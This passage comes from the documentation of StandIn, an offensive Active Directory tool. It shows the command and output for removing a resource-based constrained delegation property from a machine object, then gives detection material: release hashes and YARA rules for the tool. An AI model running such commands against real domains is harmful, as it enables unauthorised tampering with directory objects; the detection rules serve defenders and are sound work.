: None    |_ AuditFlags       : None[+] accountexpires    |_ 0x7FFFFFFFFFFFFFFF

Remove msDS-AllowedToActOnBehalfOfOtherIdentity

Use Case

With write access to a machine object this function allows the operator to remove a previously added msDS-AllowedToActOnBehalfOfOtherIdentity property from the machine.


Syntax

Remove previously created msDS-AllowedToActOnBehalfOfOtherIdentity property from a machine.

C:\> StandIn.exe --computer m-10-1909-03 --remove[?] Using DC : m-w16-dc01.main.redhook.local[?] Object   : CN=M-10-1909-03    Path     : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

Detection

This outlines a number of IOC's which can aid in the detection engineering process for StandIn.


Release Package Hashes

The following table maps the release package hashes for StandIn.

-=v0.8=-StandIn_Net35.exe    SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3                        MD5: 8C942EE4553E40A7968FF0C8DC5DB9ABStandIn_Net45.exe    SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681                        MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9-=v0.7=-StandIn_Net35.exe    SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0                        MD5: 50D29F7597BF83D80418DEEFD360F093StandIn_Net45.exe    SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A                        MD5: 4E5258A876ABCD2CA2EF80E0D5D93195

Yara

The following Yara rules can be used to detect StandIn on disk, in it's default form.

rule StandIn{    meta:        author = "Ruben Boonen (@FuzzySec)"        description = "Detect StandIn string constants."    strings:        $s1 = "StandIn" ascii wide nocase        $s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase        $s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase        $s4 = ">--~~--> Args? <--~~--<" ascii wide nocase    condition:        all of ($s*)}rule StandIn_PDB{    meta:        author = "Ruben Boonen (@FuzzySec)"        description = "Detect StandIn default PDB."    strings:        $s1 = "\\Release\\StandIn.pdb" ascii wide nocase	    condition:        all of ($s*)}

SilktETW Microsoft-Windows-DotNETRuntime Yara Rule

The Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the Microsoft-Windows-DotNETRuntime ETW data provider. For testing purposes, this rule can be directly evaluated using SilkETW. It should be noted that this is a generic example rule, production alerting would required a more granular approach.

rule Silk_StandIn_Generic{    meta:        author = "Ruben Boonen (@FuzzySec)"        description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."    strings:        $s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase        $s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase    condition:        any of them}


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